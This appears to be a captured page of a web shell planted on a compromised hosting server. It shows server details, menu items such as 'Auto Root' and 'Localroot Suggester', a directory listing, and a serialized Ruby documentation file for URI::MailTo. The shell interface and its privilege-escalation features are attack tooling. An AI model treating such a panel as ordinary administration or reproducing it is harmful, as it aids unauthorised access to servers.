Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
URI /
MailTo /
Delete
Unzip
Name
Size
Permission
Date
Action
build-c.ri
1.41
KB
-rw-r--r--
2023-07-26 17:26
cdesc-MailTo.ri
790
B
-rw-r--r--
2023-07-26 17:26
check_headers-i.ri
424
B
-rw-r--r--
2023-07-26 17:26
check_to-i.ri
410
B
-rw-r--r--
2023-07-26 17:26
headers%3d-i.ri
218
B
-rw-r--r--
2023-07-26 17:26
headers-i.ri
235
B
-rw-r--r--
2023-07-26 17:26
new-c.ri
480
B
-rw-r--r--
2023-07-26 17:26
set_headers-i.ri
235
B
-rw-r--r--
2023-07-26 17:26
set_to-i.ri
220
B
-rw-r--r--
2023-07-26 17:26
to%3d-i.ri
203
B
-rw-r--r--
2023-07-26 17:26
to-i.ri
223
B
-rw-r--r--
2023-07-26 17:26
to_mailtext-i.ri
598
B
-rw-r--r--
2023-07-26 17:26
to_rfc822text-i.ri
167
B
-rw-r--r--
2023-07-26 17:26
to_s-i.ri
213
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" build:EFI"URI::MailTo::build;FT:publico:RDoc::Markup::Document:@parts[S:RDoc::Markup::Heading: leveli: textI"Description;To:RDoc::Markup::BlankLine o:RDoc::Markup::Paragraph; [I"LCreates a new URI::MailTo object from components, with syntax checking.;T@ o;; [I"IComponents can be provided as an Array or Hash. If an Array is used,;TI"6the components must be supplied as [to, headers].;T@ o;; [I"LIf a Hash is used, the keys are the component names preceded by colons.;T@ o;; [I"AThe headers can be supplied as a pre-encoded string, such as;TI"B"subject=subscribe&cc=address", or as an Array of Arrays like;To:RDoc::Markup::List: @type: LABEL:@items[o:RDoc::Markup::ListItem:@labelI"0['subject', 'subscribe'], ['cc', 'address'];T; [o;; [I"Examples:;T@ o:RDoc::Markup::Verbatim; [I"require 'uri' ;FI" ;FI"Am1 = URI::MailTo.build(['joe@example.com', 'subject=Ruby']) ;FI";puts m1.to_s -> mailto:joe@example.com?subject=Ruby ;FI" ;FI"em2 = URI::MailTo.build(['john@example.com', [['Subject', 'Ruby'], ['Cc', 'jack@example.com']]]) ;FI"Pputs m2.to_s -> mailto:john@example.com?Subject=Ruby&Cc=jack@example.com ;FI" ;FI"dm3 = URI::MailTo.build({:to => 'listman@example.com', :headers => [['subject', 'subscribe']]}) ;FI"Cputs m3.to_s -> mailto:listman@example.com?subject=subscribe;F: @file000[ I"(args);TI"lib/uri/mailto.rb;T